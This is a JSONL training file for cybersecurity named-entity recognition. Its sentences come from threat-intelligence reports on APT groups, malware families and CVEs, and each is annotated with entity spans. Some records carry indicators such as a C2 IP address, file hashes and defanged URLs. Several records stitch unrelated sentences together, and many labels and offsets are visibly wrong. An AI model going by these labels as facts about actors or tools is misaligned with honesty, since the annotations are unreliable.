{"text": "In the past , we ’ve seen groups such as Equation and Flame use malware to steal data from air-gapped networks .", "spans": {"THREAT_ACTOR: Equation": [[41, 49]], "THREAT_ACTOR: Flame": [[54, 59]]}, "info": {"id": "cyberner_stix_train_000451", "source": "cyberner_stix_train"}}
{"text": "The “ Init ” export establishes connection to port 80 of a C2 server using Wininet API .", "spans": {"TOOL: C2": [[59, 61]], "TOOL: Wininet": [[75, 82]]}, "info": {"id": "cyberner_stix_train_000452", "source": "cyberner_stix_train"}}
{"text": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Blaster.lnk :", "spans": {"FILEPATH: C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Blaster.lnk": [[0, 87]]}, "info": {"id": "cyberner_stix_train_000453", "source": "cyberner_stix_train"}}
{"text": "Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably . In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger .", "spans": {"THREAT_ACTOR: Bahamut": [[0, 7]], "TOOL: Android malware": [[69, 84]], "THREAT_ACTOR: TG-3390": [[216, 223]], "ORGANIZATION: Microsoft": [[266, 275]], "MALWARE: custom backdoor": [[301, 316]], "MALWARE: credential logger": [[321, 338]]}, "info": {"id": "cyberner_stix_train_000454", "source": "cyberner_stix_train"}}
{"text": "Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": {"TOOL: Lurk": [[0, 4]], "FILEPATH: Careto": [[228, 234]]}, "info": {"id": "cyberner_stix_train_000455", "source": "cyberner_stix_train"}}
{"text": "RuMMS Samples , C2 , Hosting Sites , Infections and Timeline In total we captured 297 RuMMS samples , all of which attempt to contact an initial C2 server that we extracted from the app package . The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented . We already published a couple of articles about ROKRAT ( here , here , here and here ) where another unrelated actor , Group123 , made the same choice but with different providers . Other interesting anomalies in June include 47 attacks on the Manufacturing industry ( which usually averages around 20 attacks a month ) and notable increases in attacks on Switzerland ( 14 ) and Brazil ( 13 ) , both of which are normally attacked only two or three times a month .", "spans": {"MALWARE: RuMMS": [[0, 5], [86, 91]], "TOOL: script-based backdoors": [[207, 229]], "THREAT_ACTOR: OilRig group": [[264, 276]], "MALWARE: ROKRAT": [[360, 366]], "THREAT_ACTOR: Group123": [[431, 439]], "ORGANIZATION: Manufacturing industry": [[556, 578]]}, "info": {"id": "cyberner_stix_train_000456", "source": "cyberner_stix_train"}}
{"text": "Application Recording — Stealing OTPs and TANs The feature that makes TrickMo different from standard SMS stealers is its unique ability to record the screen when targeted apps are running . The tool then starts a new web browser instance on the attacker’s system and submits credentials on the real VPN portal . the group 's targets include an organization in Sweden .", "spans": {"MALWARE: TrickMo": [[70, 77]], "THREAT_ACTOR: attacker’s": [[246, 256]]}, "info": {"id": "cyberner_stix_train_000457", "source": "cyberner_stix_train"}}
{"text": "In 2016 , the Mirai botnet was discovered by the malware research group MalwareMustDie .", "spans": {"TOOL: Mirai botnet": [[14, 26]], "ORGANIZATION: MalwareMustDie": [[72, 86]]}, "info": {"id": "cyberner_stix_train_000458", "source": "cyberner_stix_train"}}
{"text": "It helps the attacker find out which banks the owner of the smartphone calls – the Trojan receives a list of bank phone numbers from its C & C server . The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usuallysee in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazerin this case . Winnti : hpqhvind.exe . The configuration contains two C2 servers that are prefixed with a protocol identifier .", "spans": {"THREAT_ACTOR: Turla 's operation": [[250, 268]], "TOOL: Skipper": [[304, 311]], "THREAT_ACTOR: Winnti": [[455, 461]], "FILEPATH: hpqhvind.exe": [[464, 476]], "SYSTEM: C2 servers": [[510, 520]]}, "info": {"id": "cyberner_stix_train_000459", "source": "cyberner_stix_train"}}
{"text": "In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke .", "spans": {"MALWARE: CozyDuke": [[64, 72]], "MALWARE: CloudDuke": [[77, 86]], "THREAT_ACTOR: Dukes": [[93, 98]], "MALWARE: CosmicDuke": [[166, 176]]}, "info": {"id": "cyberner_stix_train_000460", "source": "cyberner_stix_train"}}
{"text": "Suckfly made its malware difficult to analyze to prevent their operations from being detected .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_000461", "source": "cyberner_stix_train"}}
{"text": "We also registered one episode of mobile malware spreading via a third-party botnet . The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 . In the case where the parent process is hpqhvind.exe , this sequence of bytes is present at this exact location and the malicious DLL will proceed to patch the parent process in memory . Sometimes this was a high profile , legitimate site such as ‘ diplomacy.pl ’ hosting a ZIP archive .", "spans": {"TOOL: MikroTik": [[230, 238]], "FILEPATH: hpqhvind.exe": [[338, 350]], "TOOL: DLL": [[428, 431]]}, "info": {"id": "cyberner_stix_train_000462", "source": "cyberner_stix_train"}}
{"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc .", "spans": {"MALWARE: Neptun": [[0, 6]], "THREAT_ACTOR: attackers": [[108, 117]], "ORGANIZATION: Group-IB": [[120, 128]], "MALWARE: Trojan": [[196, 202]], "MALWARE: mail tracking websites": [[205, 227]], "MALWARE: news portals": [[230, 242]], "MALWARE: electronic books": [[245, 261]], "MALWARE: computer graphics resources": [[264, 291]], "MALWARE: music portals": [[294, 307]]}, "info": {"id": "cyberner_stix_train_000463", "source": "cyberner_stix_train"}}
{"text": "These attacks deliver the Spark and Pierogi backdoors for politically-driven cyber espionage operations .", "spans": {"MALWARE: Spark": [[26, 31]], "MALWARE: Pierogi backdoors": [[36, 53]]}, "info": {"id": "cyberner_stix_train_000464", "source": "cyberner_stix_train"}}
{"text": "To lure the victims to download the malware , threat actors use SMS phishing – sending a short SMS message containing a malicious URL to the potential victims . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals . Thanks to this exploit ( Remote Code Execution exploit ) the user interaction is not required , in fact the “ enable macro ” button is not shown . Criminals are also using malvertising via search engines to lure potential victims in .", "spans": {"THREAT_ACTOR: espionage": [[228, 237]], "ORGANIZATION: economic": [[242, 250]], "THREAT_ACTOR: activity groups": [[277, 292]], "ORGANIZATION: specific individuals": [[326, 346]], "VULNERABILITY: Remote Code Execution": [[374, 395]], "TOOL: macro": [[466, 471]], "THREAT_ACTOR: Criminals": [[496, 505]], "THREAT_ACTOR: malvertising via search engines to lure potential victims in": [[521, 581]]}, "info": {"id": "cyberner_stix_train_000465", "source": "cyberner_stix_train"}}
{"text": "There is some infrastructure overlap in the C2 servers used by almost all of the FakeM variants , as well other Trojans such as MobileOrder , Psylo , and CallMe . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": {"TOOL: FakeM": [[81, 86]], "TOOL: MobileOrder": [[128, 139]], "TOOL: Psylo": [[142, 147]], "TOOL: CallMe": [[154, 160]], "THREAT_ACTOR: APT32": [[185, 190]], "THREAT_ACTOR: OceanLotus Group": [[211, 227]], "ORGANIZATION: foreign corporations": [[243, 263]], "ORGANIZATION: foreign governments": [[294, 313]], "ORGANIZATION: journalists": [[316, 327]], "ORGANIZATION: dissidents": [[345, 355]]}, "info": {"id": "cyberner_stix_train_000466", "source": "cyberner_stix_train"}}
{"text": "We determined that this chunk of data contains an array of opcode instructions ready to be interpreted by a custom virtual machine program ( from this point on referenced generically as “ VM ” ) implemented by FinFisher authors . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan . That C&C server served the latest version of the MUI files encrypted with a static RC5 key . A recent report from the United Kingdom ’s National CyberSecurity Center ( NCSC ) highlights how the accessibility of these tools “ lowers the barrier to entry to state and non - state actors in obtaining capability and intelligence . ”", "spans": {"MALWARE: FinFisher": [[210, 219]], "THREAT_ACTOR: APT threat actors": [[230, 247]], "ORGANIZATION: diplomat": [[298, 306]], "TOOL: RC5": [[510, 513]], "ORGANIZATION: United Kingdom ’s National CyberSecurity Center ( NCSC )": [[545, 601]]}, "info": {"id": "cyberner_stix_train_000467", "source": "cyberner_stix_train"}}
{"text": "Why would OurMine want to target WikiLeaks . Silence 's successful attacks currently have been limited to the CIS and Eastern European countries .", "spans": {"THREAT_ACTOR: OurMine": [[10, 17]], "ORGANIZATION: WikiLeaks": [[33, 42]]}, "info": {"id": "cyberner_stix_train_000468", "source": "cyberner_stix_train"}}
{"text": "Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release . Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": {"TOOL: Ryuk": [[36, 40], [78, 82]], "TOOL: Hermes ransomware": [[45, 62]], "TOOL: Hermes": [[104, 110]], "ORGANIZATION: CrowdStrike": [[247, 258]]}, "info": {"id": "cyberner_stix_train_000469", "source": "cyberner_stix_train"}}
{"text": "Enforce secure network authentication , where possible .", "spans": {}, "info": {"id": "cyberner_stix_train_000470", "source": "cyberner_stix_train"}}
{"text": "( Please note this is a different app and not the same as the one being spread by hxxp : //tiny [ . Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware . The following is an example Python function to decode these strings . libxselinux.old : 7f4764c6e6dabd262341fd23a9b105a3 dc96d0f02151e702ef764bbc234d1e73d2811416 ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23 .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[100, 115]], "TOOL: malware": [[192, 199]], "TOOL: Python": [[230, 236]], "FILEPATH: libxselinux.old": [[272, 287]], "FILEPATH: 7f4764c6e6dabd262341fd23a9b105a3": [[290, 322]], "FILEPATH: dc96d0f02151e702ef764bbc234d1e73d2811416": [[323, 363]], "FILEPATH: ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23": [[364, 428]]}, "info": {"id": "cyberner_stix_train_000471", "source": "cyberner_stix_train"}}
{"text": "The members of the group use a variety of tools , including CCleaner , on a daily basis to effectively remove any evidence of their operations . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": {"THREAT_ACTOR: group": [[19, 24]], "TOOL: CCleaner": [[60, 68]], "ORGANIZATION: French diplomat": [[179, 194]], "THREAT_ACTOR: actors": [[260, 266]]}, "info": {"id": "cyberner_stix_train_000472", "source": "cyberner_stix_train"}}
{"text": "It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"THREAT_ACTOR: Patchwork": [[128, 137]], "VULNERABILITY: CVE-2015-1641": [[307, 320]], "VULNERABILITY: CVE-2017-11882": [[325, 339]], "THREAT_ACTOR: Attackers": [[342, 351]], "TOOL: C&C": [[400, 403]], "ORGANIZATION: oil": [[536, 539]], "ORGANIZATION: gas": [[542, 545]], "ORGANIZATION: petrochemical companies": [[552, 575]], "ORGANIZATION: executives": [[605, 615]]}, "info": {"id": "cyberner_stix_train_000473", "source": "cyberner_stix_train"}}
{"text": "The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security . Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: mssecsvc2.0": [[50, 61]], "ORGANIZATION: Symantec": [[145, 153]], "THREAT_ACTOR: Lazarus": [[180, 187]], "ORGANIZATION: customers": [[225, 234]]}, "info": {"id": "cyberner_stix_train_000474", "source": "cyberner_stix_train"}}
{"text": "C:\\Users\\[user name]\\Downloads\\Telegram Desktop\\UnionCryptoTraderSetup.exe .", "spans": {"FILEPATH: Desktop\\UnionCryptoTraderSetup.exe": [[40, 74]]}, "info": {"id": "cyberner_stix_train_000475", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have observed TG-3390 actors using tools that are favored by multiple threat groups :", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[30, 37]]}, "info": {"id": "cyberner_stix_train_000476", "source": "cyberner_stix_train"}}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "ORGANIZATION: consumer": [[76, 84]], "TOOL: Carberp": [[176, 183]], "MALWARE: decoy documents": [[190, 205]], "TOOL: InPage": [[218, 224]], "VULNERABILITY: exploits": [[225, 233]], "ORGANIZATION: politically": [[276, 287]], "ORGANIZATION: militarily": [[291, 301]]}, "info": {"id": "cyberner_stix_train_000477", "source": "cyberner_stix_train"}}
{"text": "FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": {"THREAT_ACTOR: FANCY BEAR": [[0, 10]], "THREAT_ACTOR: Sofacy": [[27, 33]], "THREAT_ACTOR: APT 28": [[37, 43]]}, "info": {"id": "cyberner_stix_train_000478", "source": "cyberner_stix_train"}}
{"text": "Timebombs , Dynamic Code Loading and Reflection If Google Bouncer was not detected , the application starts a time bomb which initiates the malicious flow only after 20 seconds and will run every 2 hours . Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China — so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China .", "spans": {"SYSTEM: Google Bouncer": [[51, 65]], "VULNERABILITY: CVE-2017-10271": [[316, 330]], "TOOL: PowerShell": [[344, 354]], "MALWARE: Poison Ivy": [[492, 502]], "MALWARE: PIVY": [[505, 509], [591, 595]], "MALWARE: RAT": [[516, 519]], "THREAT_ACTOR: actors": [[557, 563]]}, "info": {"id": "cyberner_stix_train_000479", "source": "cyberner_stix_train"}}
{"text": "German Bundestag & Political Parties :", "spans": {"ORGANIZATION: German Bundestag & Political Parties": [[0, 36]]}, "info": {"id": "cyberner_stix_train_000480", "source": "cyberner_stix_train"}}
{"text": "With the ability to hide its icon from the launcher and hijack popular existing apps on a device , there are endless possibilities to harm a user ’ s digital even physical security . Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems . They explain why the company has chosen to book that particular hotel . ( Vox , USA Today )", "spans": {"ORGANIZATION: Group-IB": [[183, 191]], "ORGANIZATION: financial institutions": [[241, 263]], "TOOL: Corkow malware": [[313, 327]], "ORGANIZATION: Vox": [[453, 456]], "ORGANIZATION: USA Today": [[459, 468]]}, "info": {"id": "cyberner_stix_train_000481", "source": "cyberner_stix_train"}}
{"text": "BLOCKER_BANKING_START – display phishing HTML page for entry of bank card details . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": {"MALWARE: Microsoft Word attachment": [[164, 189]], "VULNERABILITY: CVE-2017-0199": [[222, 235]], "TOOL: ZeroT Trojan": [[250, 262]], "TOOL: PlugX Remote Access Trojan": [[294, 320]], "TOOL: RAT": [[323, 326]], "ORGANIZATION: Symantec": [[331, 339]], "THREAT_ACTOR: Leafminer": [[366, 375]], "VULNERABILITY: Heartbleed vulnerability": [[392, 416]], "VULNERABILITY: CVE-2014-0160": [[419, 432]]}, "info": {"id": "cyberner_stix_train_000482", "source": "cyberner_stix_train"}}
{"text": "Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM – and said that the data heist involved 6 terabytes of sensitive data .", "spans": {"THREAT_ACTOR: APT33": [[44, 49]], "ORGANIZATION: military": [[167, 175]], "ORGANIZATION: commercial": [[180, 190]], "ORGANIZATION: Citrix'": [[260, 267]]}, "info": {"id": "cyberner_stix_train_000483", "source": "cyberner_stix_train"}}
{"text": "This data shows a distinct concentration of infected devices beaconing from Gaza , Palestine . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country . The domain names and IP addresses together comprise APT1 ’s command and control framework which they manage in concert to camouflage their true origin from their English speaking targets . There are a few reasons why attackers may opt to pay for an as - a - service malware tool for their chosen campaign : • As - a - service saves attackers time .", "spans": {"TOOL: GozNym": [[117, 123]], "ORGANIZATION: banks": [[167, 172]], "ORGANIZATION: community banks": [[264, 279]], "ORGANIZATION: email service providers": [[284, 307]], "THREAT_ACTOR: APT1": [[394, 398]], "TOOL: command and control": [[402, 421]], "THREAT_ACTOR: attackers": [[559, 568]], "TOOL: an as - a - service malware tool": [[588, 620]]}, "info": {"id": "cyberner_stix_train_000484", "source": "cyberner_stix_train"}}
{"text": "Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to “ the TRITON actor ” ) describe the same phenomena , yet at the same time appear different .", "spans": {"THREAT_ACTOR: XENOTIME": [[113, 121]], "THREAT_ACTOR: TEMP.Veles": [[126, 136]], "MALWARE: TRITON": [[174, 180]]}, "info": {"id": "cyberner_stix_train_000485", "source": "cyberner_stix_train"}}
{"text": "Communication with C & C Although Asacub ’ s capabilities gradually evolved , its network behavior and method of communication with the command-and-control ( C & C ) server changed little . Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals . We will continue to observe the group ’s activities as they target industries from the United States and Europe . The purpose of these socially engineered lures is to convince the targeted users to enable macros , thereby allowing the execution chain to commence .", "spans": {"MALWARE: Asacub": [[34, 40]], "TOOL: SWCs": [[224, 228]], "THREAT_ACTOR: TG-3390": [[231, 238]]}, "info": {"id": "cyberner_stix_train_000486", "source": "cyberner_stix_train"}}
{"text": "Installation process with administrative privilege This installation method is more interesting because it reveals how the malware tries to achieve stealthier persistence on the machine . Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . Implementation of an additional anti-analysis check that compares the name of the parent process to a string stored in an encrypted resource . The opportunities for governments and law enforcement to use spyware as part of legal investigations led to the development of commercial spyware .", "spans": {"ORGANIZATION: social media": [[252, 264]], "ORGANIZATION: governments": [[512, 523]], "ORGANIZATION: law enforcement": [[528, 543]], "TOOL: commercial spyware": [[617, 635]]}, "info": {"id": "cyberner_stix_train_000487", "source": "cyberner_stix_train"}}
{"text": "Cannon gathers system information and saves it to a file named ini .", "spans": {"MALWARE: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_train_000488", "source": "cyberner_stix_train"}}
{"text": "In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group . Silence attacked financial organisations in the UK . Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software . The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks . On 24 March 2019 , Silence.ProxyBot MD5 2fe01a04d6beef14555b2cf9a717615c ) was uploaded to VirusTotal from an IP address in Sri Lanka . On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign . Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 . According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months . To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk . On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 .", "spans": {"ORGANIZATION: Novetta": [[9, 16]], "THREAT_ACTOR: Winnti": [[54, 60]], "THREAT_ACTOR: Axiom": [[98, 103]], "THREAT_ACTOR: Silence": [[112, 119], [165, 172], [931, 938], [1110, 1117], [1319, 1326], [1511, 1518]], "ORGANIZATION: financial": [[129, 138], [717, 726]], "THREAT_ACTOR: attackers": [[416, 425]], "ORGANIZATION: banks": [[511, 516]], "MALWARE: Silence.ProxyBot": [[538, 554]], "FILEPATH: 2fe01a04d6beef14555b2cf9a717615c": [[559, 591]], "TOOL: VirusTotal": [[610, 620]], "TOOL: emails": [[699, 705], [1537, 1543]], "ORGANIZATION: Group-IB": [[777, 785]], "ORGANIZATION: bank": [[988, 992]], "MALWARE: Atmosphere": [[1075, 1085]], "MALWARE: Trojan": [[1090, 1096]], "FILEPATH: xfs-disp.exe": [[1183, 1195]], "ORGANIZATION: Bank": [[1250, 1254]], "THREAT_ACTOR: Silence:": [[1276, 1284]], "ORGANIZATION: Financial": [[1617, 1626]]}, "info": {"id": "cyberner_stix_train_000489", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //nttdocomo-qaq [ . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian . ThreatSight worked with the Threat Analysis Unit ( TAU ) to research the campaign . Beyond basic cybersecurity hygiene , including auditing current IT environments for vulnerabilities , implementing needed patches and regularly employing backups , its imperative to have multifactor authentication as a minimum on any externalfacing RDP , whilst preferably removing externalfacing RDP altogether .", "spans": {"THREAT_ACTOR: operators": [[69, 78]], "THREAT_ACTOR: APT28": [[86, 91]], "ORGANIZATION: citizens": [[119, 127], [131, 139]], "ORGANIZATION: ThreatSight": [[186, 197]], "ORGANIZATION: Threat Analysis Unit": [[214, 234]], "ORGANIZATION: TAU": [[237, 240]]}, "info": {"id": "cyberner_stix_train_000490", "source": "cyberner_stix_train"}}
{"text": "In the past , Sednit used a similar technique for credential phishing .", "spans": {"THREAT_ACTOR: Sednit": [[14, 20]]}, "info": {"id": "cyberner_stix_train_000491", "source": "cyberner_stix_train"}}
{"text": "The VBA drops and executes a new variant of Seduploader .", "spans": {"TOOL: VBA": [[4, 7]], "MALWARE: Seduploader": [[44, 55]]}, "info": {"id": "cyberner_stix_train_000492", "source": "cyberner_stix_train"}}
{"text": "The first set of commands gathers information about the victim ’s computer and environment :", "spans": {}, "info": {"id": "cyberner_stix_train_000493", "source": "cyberner_stix_train"}}
{"text": "] comgooogel [ . The Cloud Atlas implants utilize a rather unusual C&C mechanism . The HTRAN utility is merely a middle-man , facilitating connections between the victim and the attacker who is using the hop point . It contains features such as having the victim ’s email address pre - filled and displaying their appropriate company logo and background image , extracted from the target organization ’s real Microsoft 365 login page .", "spans": {"TOOL: HTRAN": [[87, 92]]}, "info": {"id": "cyberner_stix_train_000494", "source": "cyberner_stix_train"}}
{"text": "Nmap — BRONZE PRESIDENT used this freely available network scanning tool from the C:\\PerfLogs\\ folder .", "spans": {"TOOL: Nmap": [[0, 4]], "THREAT_ACTOR: BRONZE PRESIDENT": [[7, 23]]}, "info": {"id": "cyberner_stix_train_000495", "source": "cyberner_stix_train"}}
{"text": "This background image likely contains a fake “ software update ” screen . Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services .", "spans": {"ORGANIZATION: WikiLeaks": [[142, 151]], "ORGANIZATION: DNS provider": [[155, 167]], "ORGANIZATION: intelligence services": [[451, 472]]}, "info": {"id": "cyberner_stix_train_000496", "source": "cyberner_stix_train"}}
{"text": "Segment networks and segregate them into security zones .", "spans": {}, "info": {"id": "cyberner_stix_train_000497", "source": "cyberner_stix_train"}}
{"text": "“ These communication channels are hard to discover and even harder to block entirely . In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards . Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world .", "spans": {"THREAT_ACTOR: Scattered Canary": [[179, 195]]}, "info": {"id": "cyberner_stix_train_000498", "source": "cyberner_stix_train"}}
{"text": "'' This security hole is currently present in every operating system image for A83T , H3 or H8 devices that rely on kernel 3.4 , he added . In March 2018 we detected an ongoing campaign . Winnti Group targeting universities in Hong Kong . Once a system was exploited a unique downloader was dropped onto the victim ’s disk , containing a customized micro backdoor written in Assembler .", "spans": {"SYSTEM: A83T": [[79, 83]], "SYSTEM: H3": [[86, 88]], "SYSTEM: H8": [[92, 94]], "SYSTEM: kernel 3.4": [[116, 126]], "THREAT_ACTOR: Winnti Group": [[188, 200]], "TOOL: Assembler": [[375, 384]]}, "info": {"id": "cyberner_stix_train_000499", "source": "cyberner_stix_train"}}
{"text": "Each of these layers seems to be different to some extent in the various samples we found .", "spans": {}, "info": {"id": "cyberner_stix_train_000500", "source": "cyberner_stix_train"}}
{"text": "Should a device become infected , this backdoor can not be removed without root privilege . The basic principles of targeted attacks on financial institutions have not changed since 2013 when the Anunak , Corkow , Buhtrap , and Lurk groups began conducting the first attacks on Russian banks . So the next block of the first one in the level can not be determined . Information about executed programs that violate one or more of these rules is recorded in the XProtect Database ( XPdb ) , which is stored in SQLite 3 format and located at /var / protected / xprotect / XPdb .", "spans": {"ORGANIZATION: financial institutions": [[136, 158]], "THREAT_ACTOR: Anunak": [[196, 202]], "THREAT_ACTOR: Corkow": [[205, 211]], "THREAT_ACTOR: Buhtrap": [[214, 221]], "THREAT_ACTOR: Lurk groups": [[228, 239]], "ORGANIZATION: banks": [[286, 291]], "SYSTEM: XProtect Database ( XPdb )": [[461, 487]]}, "info": {"id": "cyberner_stix_train_000501", "source": "cyberner_stix_train"}}
{"text": "The second type of apps reveals an evolution in the author 's tactics . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . The ELMER variant 6c33223db475f072119fe51a2437a542 beaconed to the C2 IP address 121.127.249.74 over port 443 . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": {"MALWARE: rastls.dll": [[165, 175]], "MALWARE: Sycmentec.config files": [[180, 202]], "MALWARE: ELMER": [[209, 214]], "FILEPATH: 6c33223db475f072119fe51a2437a542": [[223, 255]], "TOOL: C2": [[272, 274]], "IP_ADDRESS: 121.127.249.74": [[286, 300]], "MALWARE: AgentTesla remote access trojan ( RAT": [[348, 385]], "TOOL: Cobalt Strike": [[390, 403]], "TOOL: njRAT": [[416, 421]]}, "info": {"id": "cyberner_stix_train_000502", "source": "cyberner_stix_train"}}
{"text": "While it ’ s not the first of its kind , this Android malware app is more sophisticated than similar apps and possesses interesting features that enable its operators to steal transaction authorization codes from victims who download the app . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented .", "spans": {"SYSTEM: Android": [[46, 53]], "THREAT_ACTOR: threat groups": [[334, 347]], "VULNERABILITY: CVE-2018-0798": [[366, 379]], "TOOL: RTF weaponizer": [[389, 403]], "MALWARE: script-based backdoors": [[417, 439]], "THREAT_ACTOR: OilRig group": [[474, 486]]}, "info": {"id": "cyberner_stix_train_000504", "source": "cyberner_stix_train"}}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155], [316, 329]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]], "MALWARE: POWRUNER": [[251, 259]], "MALWARE: malicious RTF": [[282, 295]]}, "info": {"id": "cyberner_stix_train_000505", "source": "cyberner_stix_train"}}
{"text": "Unit 42 followed network traces and pivoted on the information left behind by this actor , such as open directories , document metadata , and binary peculiarities , which enabled us to find a custom-made piece of malware , that we named \" CapturaTela \" . One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: CapturaTela": [[239, 250]], "ORGANIZATION: bank": [[301, 305]]}, "info": {"id": "cyberner_stix_train_000506", "source": "cyberner_stix_train"}}
